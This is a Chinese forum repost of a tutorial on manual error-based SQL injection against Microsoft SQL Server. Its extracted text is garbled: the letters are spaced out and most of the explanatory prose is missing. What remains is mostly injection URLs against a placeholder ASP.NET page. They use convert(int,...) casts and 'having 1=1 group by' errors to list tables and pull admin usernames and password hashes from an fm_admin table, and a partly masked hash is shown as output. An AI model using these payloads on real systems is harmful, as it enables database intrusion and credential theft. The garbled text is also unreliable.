搜索

[20777] 2017-06-10_MSSQL显错模式的手工注入实现原理思考和实战

文档创建者:s7ckTeam
浏览次数:35
最后更新:2025-01-18
2017-06-10_MSSQL显错模式的手工注入实现原理思考和实战 M S S Q L L e m o n S e c   2 0 1 7 - 0 6 - 1 0 M s s q l         便         h a v i n g   1 = 1   g r o u p   b y         i n t c h a r i n t   4 4         t i n y i n t ( ) s m a l l i n t ( ) i n t ( ) t i n y i n t s m a l l i n t i n t i n t s m a l l i n t t i n y i n t 4 2 2 2 4 使 c o n v e r t ( , ( ) ) c a s t (   a s   ) g r o u p   b y   h a v i n g   s e l e c t   n a m e   f r o m   s y s o b j e c t s   w h e r e   x t y p e = ' u '     s e l e c t   n a m e   f r o m   s y s o b j e c t s   w h e r e   x t y p e = ' u '   a n d   n a m e   n o t   i n ( ' 1 ' ' 2 ' . . . ) s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s s e l e c t   t a b l e _ n a m e   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ n a m e   n o t   i n   ( ' 1 ' ' 2 ' . . . )   h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3 m s s q l a c c e s s h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   a n d   u s e r > 0 J x b _ O j c _ Z j _ C n h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   a n d   d b _ n a m e ( ) > 0 J x b _ O j c _ Z j _ C n
h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   a n d   1 = c o n v e r t ( i n t , ( s e l e c t   t o p   1   n a m e   f r o m   s y s o b j e c t s   w h e r e   x t y p e = u   a n d   s t a t u s > 0 ) ) ( ) h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   a n d   1 = c o n v e r t ( i n t , ( s e l e c t   t o p   1   n a m e   f r o m   s y s o b j e c t s   w h e r e   x t y p e = u   a n d   s t a t u s > 0   a n d   n a m e   n o t   i n ( ' F M _ P a g e _ C l a s s ,   ' D 9 9 _ T m p ' ,   ' D 9 9 _ C M D ' ) ) ) D h a v i n g   1 = 1     h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   s e l e c t   *   f r o m   F M _ a d m i n   h a v i n g   1 = 1 g r o u p   b y
:   h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   a n d   1 = c o n v e r t ( i n t , ( s e l e c t   t o p   1   a d m i n n a m e   f r o m   f m _ a d m i n ) ) a d m i n :   h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   a n d   1 = c o n v e r t ( i n t , ( s e l e c t   t o p   1   p a s s w o r d   f r o m   f m _ a d m i n ) ) B D 2 C 2 * * * * * * * * * * B F 2 F 4 2 8 4 B F D A 1 ,   h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   a n d   1 = c o n v e r t ( i n t , ( s e l e c t   t o p   1   a d m i n n a m e   f r o m   f m _ a d m i n   w h e r e   u s e r n a m e   n o t   i n   ( a d m i n ) ) ) h t t p : / / w w w . x x x . c o m / s h o w n e w s . a s p x ? i d = 3   a n d   1 = c o n v e r t ( i n t , ( s e l e c t   t o p   1   p a s s w o r d   f r o m   f m _ a d m i n   w h e r e   a d m i n n a m e   n o t   i n   ( a d m i n ) ) )
w h e r e m d 5  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理